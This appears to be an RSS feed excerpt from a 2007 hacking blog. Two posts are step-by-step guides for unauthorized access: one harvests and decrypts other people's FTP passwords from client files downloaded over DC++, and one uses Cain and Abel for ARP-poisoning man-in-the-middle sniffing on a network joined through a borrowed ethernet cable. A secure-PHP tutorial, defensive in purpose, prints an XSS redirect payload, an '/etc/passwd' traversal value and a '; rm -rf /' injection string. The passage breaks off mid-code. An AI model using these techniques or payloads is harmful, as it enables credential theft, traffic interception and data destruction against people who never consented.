		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>How to get access to various FTP sites</title>
		<link>http://bothack.wordpress.com/2007/11/16/how-to-get-access-to-various-ftp-sites/</link>
		<comments>http://bothack.wordpress.com/2007/11/16/how-to-get-access-to-various-ftp-sites/#comments</comments>
		<pubDate>Fri, 16 Nov 2007 02:52:11 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[DIY]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Techies]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/12/01/how-to-get-access-to-various-ftp-sites/</guid>
		<description><![CDATA[You all know or should know that there are SEVERAL ways to do something, they all might be right.I&#8217;m going to show you the most simple but most rewarding also (in my opinion) way to get access to ftps.You start with downloading DC++ from google. For all of you who don&#8217;t know what DC++ is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=424&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>You all know or should know that there are SEVERAL ways to do something, they all might be right.I&#8217;m going to show you the most simple but most rewarding also (in my opinion) way to get access to ftps.You start with downloading DC++ from google. For all of you who don&#8217;t know what DC++ is then it is a p2p software to share files. It&#8217;s not like Kazaa or something so you just don&#8217;t search, you have to enter &#8220;hubs&#8221; (it&#8217;s like rooms kind of) and search for the files in there. Every hub has got its own rules, for example you must share atleast 10GB to enter it or something. But there are also hubs with no share limit so you can enter them right away, but they aren&#8217;t really the best. I would recommend to get maybe 50GB share or something because then you can enter MOST of the hubs. The better hubs you enter the higher is the chance that you will find password.</p>
<p>Right when you&#8217;ve downloaded DC++ and made all the configurations then enter a good hub (one with alot of people). Now to the harvesting password part. To get hold of password you need to get some dat files. For example some ftp clients store their passwords in files. One of the most popular clients is Flash FXP, that client stores the password in the sites.dat file. So what you do is to search for the sites.dat file in DC++ and then make sure that you uncheck the option &#8220;Only find user with free slots&#8221; since the file you are going to download only take around 3 kb or something. Then you should be able to download it even if your target doesn&#8217;t have any free slots. Right after you&#8217;ve downloaded around 5 of them go to google and search for Flash FXP password decrypter. Then just open the sites.dat file with notepad and decrypt the passwords. Tada! You can now enter the ftp, unless they changed it of course.</p>
<p>Another way is to search for another clients password file. One called WS FTP32. Hmm&#8230; now when I think about it I don&#8217;t really remember butI think the<br />
file was called wsftp.ini. You could use an online decrypter to decrypt those passwords&#8230; you could just google it or go to:</p>
<p>http://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html</p>
<p>That was it I suppose&#8230; oh and don&#8217;t do anything illegal! Like downloading warez or something. This tutorial is for educational purposes only, which explains its intended vagueness. =)</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/424/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/424/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/424/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/424/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/424/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=424&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/11/16/how-to-get-access-to-various-ftp-sites/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>Login to Windows Xp without a password</title>
		<link>http://bothack.wordpress.com/2007/11/15/login-to-windows-xp-without-a-password/</link>
		<comments>http://bothack.wordpress.com/2007/11/15/login-to-windows-xp-without-a-password/#comments</comments>
		<pubDate>Thu, 15 Nov 2007 11:54:59 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Computers]]></category>
		<category><![CDATA[DIY]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/12/10/login-to-windows-xp-without-a-password/</guid>
		<description><![CDATA[Honeytech has posted a tutorial which describes how you can log in to Windows Xp without the help of a password. Disclaimer: This is for educational purposes only. This site is not liable if you mess up your operating system using this tutorial.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=438&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Honeytech has posted a <a href="http://honeytech.wordpress.com/2006/12/03/how-to-bypass-a-windows-xp-password-without-any-programs/">tutorial</a> which describes how you can log in to Windows Xp without the help of a password.</p>
<p><strong>Disclaimer</strong>: <em>This is for educational purposes only. This site is not liable if you mess up your operating system using this tutorial. </em></p>
<p><em> </em></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/438/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/438/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/438/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/438/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/438/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=438&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/11/15/login-to-windows-xp-without-a-password/feed/</wfw:commentRss>
		<slash:comments>79</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>
	</item>
		<item>
		<title>Windows Animated Cursor Vulnerability</title>
		<link>http://bothack.wordpress.com/2007/10/26/windows-animated-cursor-vulnerability/</link>
		<comments>http://bothack.wordpress.com/2007/10/26/windows-animated-cursor-vulnerability/#comments</comments>
		<pubDate>Fri, 26 Oct 2007 09:48:45 +0000</pubDate>
		<dc:creator>Ganesh APP</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2007/04/12/windows-animated-cursor-vulnerability/</guid>
		<description><![CDATA[Once again, there is a flaw in the way something from Microsoft was written. There is a new exploit that allows arbitrary code to be executed on the client side using an animated cursor vulnerability. Here&#8217;s an excerpt from the site&#8230; A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=494&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Once again, there is a flaw in the way something from Microsoft was written. There is a new exploit that allows arbitrary code to be executed on the client side using an animated cursor vulnerability. Here&#8217;s an excerpt from the site&#8230;</p>
<blockquote><p> A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user&#8217;s system.</p>
<p>The vulnerability is caused due to an unspecified error in the handling of animated cursors and can e.g. be exploited by tricking a user into visiting a malicious <a href="http://www.monsterguide.net/how-to-make-a-website.shtml">website</a> using Internet Explorer or opening a malicious e-mail message.</p>
<p>Successful exploitation allows execution of arbitrary code.</p></blockquote>
<p>So be careful where you go for awhile.</p>
<p><strong> Quick Info:</strong> Affects IE users on windows xp, 2000, and vista.</p>
<p><strong>Helpful Link:</strong> <a href="http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx" target="_blank">http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx</a><br />
<a href="http://secunia.com/advisories/24659/" target="_blank">http://secunia.com/advisories/24659/</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/494/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/494/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/494/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/494/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/494/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=494&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/10/26/windows-animated-cursor-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5cd6370914960d47fca5f13586d14be7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">APP</media:title>
		</media:content>
	</item>
		<item>
		<title>Mitm, arp poison routing, network sniffing using cain and able</title>
		<link>http://bothack.wordpress.com/2007/04/12/mitm-arp-poison-routing-network-sniffing-using-cain-and-able/</link>
		<comments>http://bothack.wordpress.com/2007/04/12/mitm-arp-poison-routing-network-sniffing-using-cain-and-able/#comments</comments>
		<pubDate>Thu, 12 Apr 2007 10:19:57 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Monthly Spl.]]></category>
		<category><![CDATA[Techies]]></category>
		<category><![CDATA[Wireless]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2007/04/12/mitm-arp-poison-routing-network-sniffing-using-cain-and-able/</guid>
		<description><![CDATA[Firstly let me get a few things straight: 1. This is not about “what is arp and mitm?” there are already enough articles about that in BotHack. This is merely how to do it using cain and able so before reading this article go and read some of the others so that your not just [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=496&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>Firstly let me get a few things straight: </strong></p>
<p>1. This is not about “<a href="http://bothack.wordpress.com/2006/06/03/monthly-spl-arp-poison-routing-for-dummies/" target="_blank">what is arp and mitm?</a>” there are already enough articles about that in BotHack. This is merely how to do it using cain and able so before reading this article go and read some of the others so that your not just a script kiddy.</p>
<p>2. I’m gong to assume that you <strong>can&#8217;t</strong> run .exe files on what ever account you are using and therefore I will tell you how to get around this.</p>
<p>3. <em><strong>I do not take any responsibility for any of the information in this document or the uses it is put to</strong></em>.</p>
<p>Ok now that we have that sorted out&#8230;</p>
<p><strong> What you will need: </strong></p>
<ul>
<li> A laptop.</li>
<li> Cain and able. Download it from, <a href="http://www.oxid.it/index.html" target="_blank">www.oxid.it/index.html</a></li>
<li> A network to sniff.</li>
</ul>
<p><strong> Now onto how to do this: </strong></p>
<p>1) Download and install cain and able.</p>
<p>2) Set your laptop up and steal an ethernet connection from a nearby computer on the network. Plug the Ethernet cable in. You are now connected. With no restrictions on what you can run.</p>
<p><span id="more-496"></span></p>
<p>3) Start cain and able.</p>
<p>4) Now click on the sniffer tab. Now notice the two symbols &#8211; the one that looks the same as the one on the sniffer tab and the one that looks like a nuclear sign.</p>
<p>5) Mouse over them and they will tell you that one starts the sniffer and the other starts arp poisoning.</p>
<p>6) Now click on configure -&gt; click on the arp tab and make sure that you are using your real ip and mac address, if you don’t you wont get any hosts or be able to arp poision.<br />
7) Now start the sniffer and press the blue plus sign. This will let you scan for hosts in your subnet.</p>
<p>8) Now go back to configure and select use a spoofed ip and mac address. Now type an ip from your sub net but the last bit must be numbers that are unused so the network doesn’t get confused.</p>
<p>9) Select all the hosts you find and right click and go resolve host name. Now try to find the router, it will usually stand out easily. The router probably wont have a name as well as being a different brand from everything else and have a really low or really high ip address so you should spot it easily.</p>
<p>10) Now click on the arp tab at the bottom of the sniffer window.  Click on the top table part and click the blue plus sign again. This brings up a window that allows you to select the ip addresses that you want to arp poison the first one you select should be the router and in the second box select any computers you want to listen to.</p>
<p>11) Click ok. Click the start arp button. You are now listening between the router and as many computers as you selected.</p>
<p>12) Watch as the routed packets role in. Select the password tab at the bottom of the screen and watch the passwords appear.</p>
<p>13) Any password hashes can be sent to the cracker and broken form there but that isn’t going to be covered in this article. I am sure you can work that out or may be I shall post it later.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/496/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/496/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/496/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=496&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/04/12/mitm-arp-poison-routing-network-sniffing-using-cain-and-able/feed/</wfw:commentRss>
		<slash:comments>42</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>Secure PHP Programming!</title>
		<link>http://bothack.wordpress.com/2007/04/11/secure-php-programming/</link>
		<comments>http://bothack.wordpress.com/2007/04/11/secure-php-programming/#comments</comments>
		<pubDate>Wed, 11 Apr 2007 15:11:19 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Monthly Spl.]]></category>
		<category><![CDATA[Techies]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2007/04/11/secure-php-programming/</guid>
		<description><![CDATA[When a web site is cracked, it typically tends to be a simple common sense mistake by a program author who forgets what an attacker can do with his code. By keeping good, secure practices when programming, you should be able to produce solid code. NOTE: I expect you to be a somewhat fluent PHP [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=492&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>When a web site is cracked, it typically tends to be a simple common sense mistake by a program author who forgets what an attacker can do with his code. By keeping good, secure practices when programming, you should be able to produce solid code.</p>
<p><strong> NOTE:</strong> I expect you to be a somewhat fluent PHP developer who has a general idea of what&#8217;s going on in computer/network security. If you don&#8217;t understand some part of the code, you should probably read up on some PHP tutorials, and also read some of the security guides on php.net and other locations on the Internet.</p>
<p>However, before I even get into the code part of this shin dig, one obvious fact should be stated that you should never give a public_html directory (or any other directory that you are using to host your files) nor any of its files ownership by any user with root privileges. This and any other techniques you can think of must be implemented in order to minimize the damage an attacker can do. That being said, on with coding!</p>
<p>Let&#8217;s look at a typical attack of a PHP program. The following code is an example of an unsecure script to &#8216;echo&#8217; the visitor&#8217;s name:</p>
<pre>&lt;?php
if (isSet($_POST['name']))
{
echo "Hello, " . $_POST['name'];
}
else
{
echo '&lt;form action="' . $PHPSELF . '" method="post"&gt;&lt;br&gt;';
echo 'Your name, please:  &lt;input type="text" name="name"&gt;&lt;br&gt;';
echo '&lt;input type="submit" value="Submit"&gt;';
echo "&lt;/form&gt;";
}
?&gt;</pre>
<p>Now this may look fine if you were to input a name such as &#8216;John&#8217; or &#8216;Marry&#8217;, but what if the attacker were to input something like:</p>
<pre>&lt;script language="JavaScript" type="text/javascript"&gt; window.location.href="http://www.bad-side-to-go-to.com/"; &lt;/script&gt;</pre>
<p><span id="more-492"></span></p>
<p>This means that this script would allow the attacker to deface your page (among many other evil little deeds such as setting up a backdoor with a little skill). As a practice, you should never, ever output code that is directly inputted from the user. In this case, PHP has a few functions that would allow us to solve this problem.</p>
<p>First off, strip_tags() simply removes HTML and PHP tags from a string. For example:</p>
<pre>&lt;?php
$str = "&lt;html&gt;hi&lt;/html&gt;";
echo strip_tags($str);
// outputs 'hi'
?&gt;</pre>
<p>This works for most cases, but there are also ways of outputting the HTML code without executing it. Two functions, htmlentities() and htmlspecialchars(), convert any sort of &lt;, &gt;, &#8221; and &amp; to their HTML entities (HTML entities output code instead of executing it, ex. a web site might give your browser &#8220;&amp; gt;&#8221;, but the web browser outputs that as &#8220;&gt;&#8221;). Here&#8217;s an example of using htmlentities():</p>
<pre>&lt;?php
$str = "&lt;html&gt;hi&lt;/html&gt;";
echo htmlentities($str);
// outputs '&lt;html&gt;hi&lt;/html&gt;'
?&gt;</pre>
<p>This way, you can see the actual code but it won&#8217;t be executed (as in you would see the JavaScript code I showed you above, but you won&#8217;t have the page redirect). I like to use htmlentities() because it converts ALL of HTML entities to their representitive codes, but htmlspecialchars() is fine for simply wanting to thwart off an attacker. (Note that htmlspecialchars() works exactly the same as htmlentities() does as far as usage is concerned.)</p>
<p>So, here&#8217;s an example of a fixed version of the script I showed you earlier:</p>
<pre>&lt;?php
if (isSet($_POST['name']))
{
echo "Hello, " . htmlspecialchars($_POST['name']);
}
else
{
echo '&lt;form action="' . $PHPSELF . '" method="post"&gt;&lt;br&gt;';
echo 'Your name, please:  &lt;input type="text" name="name"&gt;&lt;br&gt;';
echo '&lt;input type="submit" value="Submit"&gt;';
echo "&lt;/form&gt;";
}
?&gt;</pre>
<p><strong>NOTE:</strong> About 90% or more of PHP-related exploits are from some kind of way of attacking the developer&#8217;s input ($_GET, $_POST&#8230;).</p>
<p>Outputted code is not the only kind of input attack we have to worry about. Another kind is that which involve the programmer reading arbitrary files. For example, let&#8217;s say we have a script like:</p>
<pre>&lt;?php
if (isSet($_GET['file']))
{
$theFile = fopen($_GET['file'], "r");
echo fread($theFile, filesize($_GET['file']));
fclose($theFile);
}
else
{
echo '&lt;form action="' . $PHPSELF . '" method="get"&gt;&lt;br&gt;';
echo '&lt;select name="file"&gt;&lt;option value="testFile.html"&gt;testFile.html&lt;/select&gt;&lt;br&gt;';
echo '&lt;input type="submit" value="Submit"&gt;';
echo "&lt;/form&gt;";
}
?&gt;</pre>
<p>This may look all fine and dandy, but it&#8217;s flawed out the kazoo. First of all, since this form uses the &#8216;get&#8217; method of handling input, the user can simply change the file from the URL line of the browser. Second, an attacker could simply create a HTML page on his/her own site with code like:</p>
<pre>&lt;form action="http://yoursitehere.com/scriptijustwrote.php" method="get"&gt;
&lt;input type="text" name="file"&gt; &lt;input type="submit" value="Submit"&gt;
&lt;/form&gt;</pre>
<p>Either way, they can change the file you open to anything they like. For example, let&#8217;s say that they set $_GET['file'] to be something like &#8216;/etc/passwd&#8217;. They could have that easily obtained and possibly cracked into your account from the UNIX &#8216;passwd&#8217; file! (Not to mention any other sensitive files they could&#8217;ve opened from this script&#8230;)</p>
<p>Clearly this script is very, very dangerous for you as a programmer. There are a few options you can do to prevent this:</p>
<p>First off, let&#8217;s say that you only have a list of available files that the script will open. Change the file opening code to first see if the file is one that you will let it open, such as:</p>
<pre>if ($_GET['file'] == "testFile.html")
{
// open the file
}
else
{
// don't open the file
}</pre>
<p>Or, even better would be something like:</p>
<pre>switch ($_GET['file'])
{
case "testFile.html":
$file = "testFile.html";
break;
case "otherFile.html":
$file = "otherFile.html";
break;
}
// open the file using $file</pre>
<p>Another option would be to remove any slashes or dots from the filename, but then again you would still allow the attacker to open any file in that single directory. If that directory is safe, then use str_replace() like so:</p>
<pre>$file = str_replace("/", "", str_replace("\", "", str_replace(".", "", $_POST['file'])));</pre>
<p>Now, only open the $file variable.</p>
<p>This option is definitely not recommended simply because that entire directory is vulnerable to be publicly accessible, but if you don&#8217;t mind then go ahead.</p>
<p>Now then, let&#8217;s have a look at another type of input attack in the form of running arbitrary programs. Let&#8217;s say you have a script that will use the system command &#8216;ping&#8217; to see if a network target is alive. Here&#8217;s an example of this script as a vulnerability:</p>
<pre>&lt;?php
if (isSet($_POST['target']))
{
system("ping " . $_POST['target']);
}
else
{
echo '&lt;form action="' . $PHPSELF . '" method="post"&gt;&lt;br&gt;';
echo '&lt;input type="text" name="target" value="Target Address"&gt;&lt;br&gt;';
echo '&lt;input type="submit" value="Submit"&gt;&lt;/form&gt;';
}
?&gt;</pre>
<p>This would be fine if the user simply inputted a target, like &#8220;yahoo.com&#8221;. However, what if the attacker inputted a statement like &#8220;; rm -rf /&#8221;? Just like that, your entire filesystem got whipped clean from one vulnerable script (assuming your account has root privileges, but either way a lot of important stuff is getting deleted).</p>
<p>There are a few solutions here, chiefly to filter out any bad input using a function like preg_replace(), but even I had trouble learning how to use that function. A more simple, but not as secure, solution is to use escapeshellcmd(). This function returns a string from your command that prevents the user from running any other program than the one you want it to run (&#8220;ping&#8221; in this example). As an example, you&#8217;d simply do this:</p>
<pre>system(escapeshellcmd("ping " . $_POST['target']));</pre>
<p>While this prevents any other programs from being run, it does not prevent the attacker from inputting invalid data to &#8216;ping&#8217;. If there was an exploit for that program or some kind of input that would make it exit or run another program itself, then you&#8217;re still screwed. Your best bet is to try and stay away from allowing visitors to access any kind of system() commands.</p>
<p>Other than input attacks, there are plenty of code problems that you as a programmer may not even know about. One thing you should always remember, however, is to keep your code from being shown as much as possible. Let&#8217;s say an attacker somehow renames your file from index.php to index.phps. On most PHP web servers, this will show all the code in index.php (including the PHP code) so that the attacker can find a flaw they wouldn&#8217;t have found without seeing the code. A good bet to keep this from happening is to make your scripts executable only in a cgi-bin directory.</p>
<p>However, some web servers do not support scripts in a cgi-bin directory. If yours does, then simply try putting a test script in that directory and &#8216;chmod +x&#8217; the file to make it executable. The code will change a little bit, because instead of PHP being inside of the HTML coded file, the HTML will be inside your PHP script! Here&#8217;s an example:</p>
<pre>#!/usr/bin/php
// if the path to PHP is different, then you'll have to change that lineecho "&lt;html&gt;n&lt;body&gt;nTesting!n&lt;/body&gt;n&lt;/html&gt;";</pre>
<p>Save this as something like &#8216;test.php&#8217; and put it in your cgi-bin directory. From your web browser, try to execute it. If it works, then it&#8217;s a good idea to use your scripts in that style in the cgi-bin to prevent code leakage. If it doesn&#8217;t work, then either e-mail your admin or rebuild your PHP/Apache or whatever installation to include this option.</p>
<p>An entirely different topic in PHP security is encryption. There are many different kinds of encryption, but compared to other languages PHP makes them all easy as pie. The easiest example of encryption is the one-way 32 bit MD5 encryption. &#8220;One way&#8221; encryption means that the data CANNOT be decrypted. This means that even if the attacker gets the encrypted data, they cannot decrypt, but instead will have to &#8216;crack&#8217; it. For example, let&#8217;s say we have a password file in our home directory (&#8216;/home/user/pass_info.php&#8217;):</p>
<pre>&lt;?php
$user = 'testuser';
$pass = md5("mypasswd");
?&gt;</pre>
<p>The md5() function converts &#8220;mypasswd&#8221; to a 32 bit &#8220;hash&#8221; (encrypted data, basically) that is about 32 or so characters long and each character is either a letter or a number. Any other text than &#8220;mypasswd&#8221; will produce a different hash, so we can rely on what the encrypted version of &#8220;mypasswd&#8221; is. Now that we have $pass set, let&#8217;s say we have another script like this that sets the user&#8217;s $_SESSION data to show he or she is logged in according to their password:</p>
<pre>&lt;?php
include("/home/user/pass_info.php");if (isSet($_SESSION['user']) &amp;&amp; isSet($_SESSION['pass']) &amp;&amp; $_SESSION['user'] == $user &amp;&amp; $_SESSION['pass'] == $pass)
{
echo 'You are logged in.';
}
else if (isSet($_POST['user']) &amp;&amp; isSet($_POST['pass']) &amp;&amp; $_POST['user'] == $user &amp;&amp; md5($_POST['pass']) == $pass)
{
$_SESSION['user'] = $user;
$_SESSION['pass'] = $pass;
?&gt;
&lt;script language="JavaScript" type="text/javascript"&gt;
alert("you are now logged in");
window.location.href = window.location.href;
&lt;/script&gt;
&lt;?php
}
else
{
?&gt;
&lt;form action="?" method="post"&gt;
&lt;input type="text" name="user"&gt;&lt;br&gt;
&lt;input type="password" name="pass"&gt;&lt;br&gt;
&lt;input type="submit" value="Login"&gt;
&lt;/form&gt;
&lt;?php
}
?&gt;</pre>
<p>In this way, $_SESSION['pass'] is a 32 bit encrypted hash instead of a plaintext password. If the attacker was to get your $_SESSION data and see that a variable names $_SESSION['pass'] was equal to a plaintext password, then he/she just cracked your user/pass! Now that we have it encrypted via md5(), he/she can only see the encrypted version. Now the attacker would have to run a bruteforce style attack on your encrypted password data which can take months depending on how good your password is. (This is also a good reason to change passwords often.)</p>
<p>If you think that md5() is out of your style, or you just want to use a different encryption key, you can use crypt() as well. crypt() uses the same method as UNIX /etc/passwd files, and is farely simple. First, let&#8217;s encrypt a string:</p>
<pre>&lt;?php
$encryptedData = crypt("testPass");
?&gt;</pre>
<p>Now, let&#8217;s make a function to compare your crypt() data with a string to see if the password is correct:</p>
<pre>&lt;?php
function verifyEncryptedData($str, $data)
{
